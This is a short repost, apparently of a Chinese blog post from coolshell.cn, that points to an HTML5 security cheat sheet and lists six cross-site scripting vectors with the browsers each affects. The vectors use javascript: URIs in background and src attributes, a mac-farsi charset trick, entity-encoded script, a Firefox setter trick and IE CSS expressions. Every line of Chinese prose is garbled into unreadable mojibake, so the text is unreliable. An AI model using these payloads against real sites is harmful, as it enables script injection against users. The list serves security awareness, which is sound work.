ÏÂÃæÕâ¸öÍøÕ¾ÂÞÁÐÁË£¬¼¸ºõËùÓеĹØÓÚHTML 5 ÔÚ¸÷ÖÖÖ÷Á÷ä¯ÀÀÆ÷ÉϵݲȫÎÊÌ⣬ÕâЩ°²È«ÎÊÌâºÜÓпÉÄܽ«»áÊǺڿ͹¥»÷ÄãµÄÍøÉϵÄÇÃÃÅש£¬ËûÃǼ¸ºõ¶¼ºÍJavascript¶¼ÓйØϵ£¬Äã¾ÍÒªºÃºÃ×¢ÒâÁË¡£
http://heideri.ch/jso/
ÏÂÃæÂÞÁм¸¸ö£º
1£©<table background=”javascript:alert(1)”>
IE6£¬7£¬8£¬9£¬ºÍOpera 8.x, 9.x, 10.x ¶¼Ö§³ÖÕâÑùµÄÓï·¨¡£
2£©<meta charset=”mac-farsi”>¼script¾alert(1)¼/script¾
Õâ¸öÎÊÌâ»á´æÔÚÓÚËùÓеÄFirefox°æ±¾ÖУ¬¿ÉÒÔÈÃÓû§½øÐÐXSS£¨¿çÕ¾½Å±¾£©¹¥»÷
3£©<script>&#x61;l&#x65;rt&#40;1)</script>
ÔÚ<script>ºÍ<style>µÄTAG¼ä£¬¸ù¾Ý±ê¾Ý£¬Æä¿ÉÒÔʹÓÃÕâÑùµÄ×Ö·ûÀ´ÔËÐнű¾¡£ÕâÔÚËùÓа汾µÄFirefox, Opera, ºÍ ChromeÖж¼»áÓÐÎÊÌâ¡£
4£©({set/**/$($){_/**/setter=$,_=1}}).$=alert
ÉÏÃæÕâ¸öÊÇFirefoxµÄÒ»¸öÓï·¨£¬Ò²»á²úÉúXSS¹¥»÷¡£
5£©<div style=”font-family:foo}x=expression(write(1));”>XXX</div>
×Ô´ÓIE5.5ºó£¬Ö±µ½IE9£¬IE¾Í¿ÉÒÔÖ§³ÖÉÏÃæÕâÑùµÄÓï·¨¡£
6£©srcÖÐÊÇ¿ÉÒÔÔËÐнű¾µÄ£¬È磺
<embed src=”javascript:alert(1)”>
<img src=”javascript:alert(1)”>
<image src=”javascript:alert(1)”>
<script src=”javascript:alert(1)”>
ÓÖÒ»¸öXSS¹¥»÷£¬¼¸ºõËùÓеÄä¯ÀÀÆ÷¶¼Ö§³ÖÕâÑùµÄ·½Ê½£¬È磺FirefoxÈ«²¿°æ±¾£¬Chrome 4.x/5.x£¬Opera 8.x/9.x/10.0£¬IE 6.0/7.0ºÍSafari 3.x/4.x
»¹Óкܶ࣬´ó¼Ò×Ô¼ºÈ¥¿´°É£¬Õâ¸öÍøÕ¾¾³£¸üеġ£×ÜÌå¸Ð¾õÏÂÀ´£¬IEºÍFirefoxµÄ°²È«ÎÊÌⶼÔÚ²®ÖÙÖ®¼ä£¬SafariòËÆÊÇÎÊÌâ×îÉٵġ£
ת×Ô- ¿á¿ÇÍø(http://coolshell.cn/?p=2416)
